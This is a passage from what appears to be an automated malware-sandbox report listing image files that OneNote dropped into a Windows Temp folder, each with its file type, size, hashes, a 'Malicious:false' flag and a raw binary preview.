                                                                                                                                            SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                            SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{CC46EDD6-9D70-4F6B-85DF-484D3C4D6915}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 77 x 627, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5136
                                                                                                                                            Entropy (8bit):7.622045262603241
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:djzuNKb3XHco17p2wolIxIx7lpskdsC/ddWNKeabJbMojpxLDTu1:VzuNKb397pwlIxKp7qs3bJb5FBTw
                                                                                                                                            MD5:FA38AFA965141EA3F17863EE8DCCDE61
                                                                                                                                            SHA1:2B4611E651AF7549C1AA73932B1136B561A7602F
                                                                                                                                            SHA-256:E1CB1A0EC9BE62D5445C73AA84DF38234002A7E164EE830C9DF24997802CB5D2
                                                                                                                                            SHA-512:A372674F5CA343321BA9C413D346070709F7685706C9C6C3DC7F61846B59253A5E6FE800DBA10AE870FD3887439B2AA106FBBB51751E92A163938A4393C43E28
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...M...s.....}8nv....PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................z`.....tRNS...................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{CE56816E-8748-4066-ADC6-F3D45351275D}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13030
                                                                                                                                            Entropy (8bit):7.948664903731204
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                            MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                            SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                            SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                            SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{CF59EC82-15CC-4D2F-B77D-B9157741097B}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):17289
                                                                                                                                            Entropy (8bit):7.962998633267186
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                            MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                            SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                            SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                            SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{D096AF77-8ACA-4467-BB11-58C9176E7549}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1924
                                                                                                                                            Entropy (8bit):7.836744258175623
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                            MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                            SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                            SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                            SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{D27FFAA2-E0AC-46EC-9674-24C0AE561657}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, progressive, precision 8, 1312x424, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):54127
                                                                                                                                            Entropy (8bit):7.804118984558617
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:4uWStwiFAImRuCERn9FCD7OTseOMUX7we1WHzjKALnTCCCCCCCCCCCCCCCCCCCCp:4uWt4AJERnyNenUWHCoTCCCCCCCCCCCm
                                                                                                                                            MD5:2CCB7FD40E61B6DD2CD936E61929FB81
                                                                                                                                            SHA1:B10AC2D16273A785C6B73E4CE047716CB451BE1C
                                                                                                                                            SHA-256:CBF4835796C6C58C2EEBB12BFE73AAAE73D0E9F37C5BD5DC63092ED776485FE8
                                                                                                                                            SHA-512:A83BFF1E484CAB88E97B72083A1E232A87856253928C1434F48C904343845AFEC8D2B1084E0BEF102C46413A34F9D8D1CB25A280FD968FF19927E17601326946
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{D4604D6A-77B1-4B3D-8BDE-AD3EDCB05326}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4081
                                                                                                                                            Entropy (8bit):7.943373267196131
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                            MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                            SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                            SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                            SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{D47A0059-3B5B-43B2-96F7-C11BA17F2C95}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13084
                                                                                                                                            Entropy (8bit):7.940058639272698
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                            MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                            SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                            SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                            SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{D4ADF46E-8EC1-4FF8-8DF8-AAA32F0EFA31}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3679
                                                                                                                                            Entropy (8bit):7.931319059366604
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                            MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                            SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                            SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                            SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{D51351EB-6CB5-4875-AE64-72696F18138C}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1657
                                                                                                                                            Entropy (8bit):7.80882577056055
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                            MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                            SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                            SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                            SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{D5B701DA-18D1-4C4C-AE21-0BBE166DD4BC}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2232
                                                                                                                                            Entropy (8bit):7.837610270261933
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                            MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                            SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                            SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                            SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{D5FA5695-D8F1-4397-91CC-F8855FC3775D}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14458
                                                                                                                                            Entropy (8bit):7.944094738048628
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                            MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                            SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                            SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                            SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{D6143B89-1A64-4C94-85AB-075510FD09F8}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14553
                                                                                                                                            Entropy (8bit):7.951135681293377
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                            MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                            SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                            SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                            SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{D61B044D-986E-4C7E-B778-F12D31CD4EB3}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12824
                                                                                                                                            Entropy (8bit):7.974776104184905
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                                                            MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                                                            SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                                                            SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
